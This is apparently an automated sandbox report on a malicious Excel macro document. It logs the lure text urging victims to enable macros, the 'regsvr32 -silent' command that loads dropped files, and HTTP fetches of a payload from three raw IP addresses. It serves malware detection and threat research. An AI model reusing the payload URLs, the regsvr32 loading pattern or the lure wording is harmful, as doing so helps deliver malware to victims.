Loading ...

Play interactive tourEdit tour

Windows Analysis Report PRMS_558161433.xls

Overview

General Information

Sample Name:PRMS_558161433.xls
Analysis ID:502658
MD5:ce9aef0eeccadcb8bbf463e2158e718c
SHA1:50ed2e5bbe1ac51ae8a26f005f17ba14ef30be88
SHA256:ad682974afe24641e8f2aa645a02f24bafd8595d6746ad789e4ef351807c6399
Tags:xls
Infos:

Most interesting Screenshot:

Detection

Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Multi AV Scanner detection for submitted file
Sigma detected: Regsvr32 Command Line Without DLL
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Potential document exploit detected (unknown TCP traffic)
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Potential document exploit detected (performs HTTP gets)

Classification

Process Tree

  • System is w10x64
  • EXCEL.EXE (PID: 5412 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • regsvr32.exe (PID: 5240 cmdline: regsvr32 -silent ..\Celod.wac MD5: 426E7499F6A7346F0410DEAD0805586B)
    • regsvr32.exe (PID: 5480 cmdline: regsvr32 -silent ..\Celod.wac1 MD5: 426E7499F6A7346F0410DEAD0805586B)
    • regsvr32.exe (PID: 2216 cmdline: regsvr32 -silent ..\Celod.wac2 MD5: 426E7499F6A7346F0410DEAD0805586B)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

barindex
Sigma detected: Regsvr32 Command Line Without DLLShow sources
Source: Process startedAuthor: Florian Roth: Data: Command: regsvr32 -silent ..\Celod.wac, CommandLine: regsvr32 -silent ..\Celod.wac, CommandLine|base64offset|contains: ,, Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 5412, ProcessCommandLine: regsvr32 -silent ..\Celod.wac, ProcessId: 5240
Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: regsvr32 -silent ..\Celod.wac, CommandLine: regsvr32 -silent ..\Celod.wac, CommandLine|base64offset|contains: ,, Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 5412, ProcessCommandLine: regsvr32 -silent ..\Celod.wac, ProcessId: 5240

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for submitted fileShow sources
Source: PRMS_558161433.xlsVirustotal: Detection: 43%Perma Link
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll

Software Vulnerabilities:

barindex
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe
Document exploit detected (UrlDownloadToFile)Show sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: \KnownDlls32\WININET.dll origin: URLDownloadToFileA
Source: global trafficTCP traffic: 192.168.2.4:49710 -> 185.244.150.172:80
Source: global trafficTCP traffic: 192.168.2.4:49710 -> 185.244.150.172:80
Source: excel.exeMemory has grown: Private usage: 1MB later: 74MB
Source: global trafficHTTP traffic detected: GET /44483.3585885417.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.244.150.172Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /44483.3585885417.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.123.53.220Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /44483.3585885417.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 101.99.90.219Connection: Keep-Alive
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.150.172
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.150.172
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.150.172
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.150.172
Source: unknownTCP traffic detected without corresponding DNS query: 185.123.53.220
Source: unknownTCP traffic detected without corresponding DNS query: 185.123.53.220
Source: unknownTCP traffic detected without corresponding DNS query: 185.123.53.220
Source: unknownTCP traffic detected without corresponding DNS query: 185.123.53.220
Source: unknownTCP traffic detected without corresponding DNS query: 101.99.90.219
Source: unknownTCP traffic detected without corresponding DNS query: 101.99.90.219
Source: unknownTCP traffic detected without corresponding DNS query: 101.99.90.219
Source: unknownTCP traffic detected without corresponding DNS query: 101.99.90.219
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.150.172
Source: unknownTCP traffic detected without corresponding DNS query: 185.123.53.220
Source: unknownTCP traffic detected without corresponding DNS query: 101.99.90.219
Source: unknownTCP traffic detected without corresponding DNS query: 101.99.90.219
Source: unknownTCP traffic detected without corresponding DNS query: 185.123.53.220
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.150.172
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 14 Oct 2021 06:36:22 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 14 Oct 2021 06:36:23 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 14 Oct 2021 06:36:24 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: GET /44483.3585885417.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.244.150.172Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /44483.3585885417.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.123.53.220Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /44483.3585885417.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 101.99.90.219Connection: Keep-Alive

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Document image extraction number: 0Screenshot OCR: Enable editing" in the yellow bar above. example of notification ( 0 PROTECTEDWARNING This file o
Source: Document image extraction number: 0Screenshot OCR: Enable Content" to perform Microsoft Excel Decryption Core to start the decryption of the document.
Source: Document image extraction number: 0Screenshot OCR: Enable Macros ) Why I can not open this document? - You are using iOS or Android device. Please us
Source: Document image extraction number: 1Screenshot OCR: Enable editing" in the yellow bar above. example of notification ( 0 pRoTEcTmwARNNG Thisfileorigi
Source: Document image extraction number: 1Screenshot OCR: Enable Content" to perform Microsoft Excel Decryption Core to start the decryption of the document.
Source: Document image extraction number: 1Screenshot OCR: Enable Macros ) Why I can not open this document? - You are using iOS or Android device. Please us
Source: Screenshot number: 8Screenshot OCR: Enable editing" in the yellow bar above. example of notification ( O pmEcTmwARN|NG This file orig
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
Source: PRMS_558161433.xlsOLE, VBA macro line: Sub auto_close()
Source: PRMS_558161433.xlsOLE, VBA macro line: Sub auto_open()
Source: PRMS_558161433.xlsOLE, VBA macro line: Private Sub saWorkbook_Opensa()
Source: PRMS_558161433.xlsOLE indicator, VBA macros: true
Source: PRMS_558161433.xlsVirustotal: Detection: 43%
Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: PRMS_558161433.xlsOLE indicator, Workbook stream: true
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -silent ..\Celod.wac
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -silent ..\Celod.wac1
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -silent ..\Celod.wac2
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -silent ..\Celod.wac
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -silent ..\Celod.wac1
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -silent ..\Celod.wac2
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\Application Data\Microsoft\FormsJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{513AB98D-5AF4-44F7-9AAA-82F37841C59D} - OProcSessId.datJump to behavior
Source: classification engineClassification label: mal72.expl.winXLS@7/2@0/3
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEWindow found: window name: SysTabControl32
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting2DLL Side-Loading1Process Injection1Masquerading1OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumNon-Application Layer Protocol2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsExploitation for Client Execution22Boot or Logon Initialization ScriptsDLL Side-Loading1Disable or Modify Tools1LSASS MemorySystem Information Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothApplication Layer Protocol12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Extra Window Memory Injection1Process Injection1Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting2NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDLL Side-Loading1LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonExtra Window Memory Injection1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
PRMS_558161433.xls43%VirustotalBrowse

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://185.123.53.220/44483.3585885417.dat0%Avira URL Cloudsafe
http://185.244.150.172/44483.3585885417.dat0%Avira URL Cloudsafe
http://101.99.90.219/44483.3585885417.dat0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

NameMaliciousAntivirus DetectionReputation
http://185.123.53.220/44483.3585885417.datfalse
  • Avira URL Cloud: safe
unknown
http://185.244.150.172/44483.3585885417.datfalse
  • Avira URL Cloud: safe
unknown
http://101.99.90.219/44483.3585885417.datfalse
  • Avira URL Cloud: safe
unknown

Contacted IPs

  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Public

IPDomainCountryFlagASNASN NameMalicious
185.244.150.172
unknownNetherlands
60117HSAEfalse
185.123.53.220
unknownunknown
133398TELE-ASTeleAsiaLimitedHKfalse
101.99.90.219
unknownMalaysia
45839SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMYfalse

General Information

Joe Sandbox Version:33.0.0 White Diamond
Analysis ID:502658
Start date:14.10.2021
Start time:08:35:24
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 4m 39s
Hypervisor based Inspection enabled:false
Report type:light
Sample file name:PRMS_558161433.xls
Cookbook file name:defaultwindowsofficecookbook.jbs
Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:Potential for more IOCs and behavior
Number of analysed new started processes analysed:6
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Detection:MAL
Classification:mal72.expl.winXLS@7/2@0/3
EGA Information:Failed
HDC Information:Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .xls
  • Changed system and user locale, location and keyboard layout to English - United States
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Attach to Office via COM
  • Scroll down
  • Close Viewer
Warnings:
Show All
  • Exclude process from analysis (whitelisted): taskhostw.exe, UpdateNotificationMgr.exe
  • Excluded IPs from analysis (whitelisted): 104.94.89.6, 40.127.240.158, 2.20.178.10, 2.20.178.56
  • Excluded domains from analysis (whitelisted): e11290.dspg.akamaiedge.net, go.microsoft.com, go.microsoft.com.edgekey.net, wu-shim.trafficmanager.net, settings-win.data.microsoft.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, settingsfd-geo.trafficmanager.net, download.windowsupdate.com.edgesuite.net
  • Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
185.244.150.172PRMS_558161433.xlsGet hashmaliciousBrowse
    185.123.53.220PRMS_558161433.xlsGet hashmaliciousBrowse
